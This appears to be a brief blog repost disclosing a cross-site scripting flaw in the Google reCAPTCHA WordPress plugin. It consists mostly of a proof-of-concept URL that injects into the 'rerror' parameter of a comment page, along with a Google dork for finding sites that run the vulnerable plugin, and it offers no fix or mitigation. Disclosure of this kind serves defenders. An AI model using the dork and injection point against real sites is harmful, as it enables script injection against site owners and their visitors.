Vulnerable : The Google reCAPTCHA WordPress plugin uses a CAPTCHA to prevent comment spam and also uses MailHide to prevent email spam
Script Page : http://www.google.com/recaptcha
POC:
http://localhost/comment-page-1/?rcommentid=(id number)&rerror=XSS
Google dork: inurl:rcommentid= error=
Google Recaptcha XSS Vulnerability |
via security-sh3ll
No comments:
Post a Comment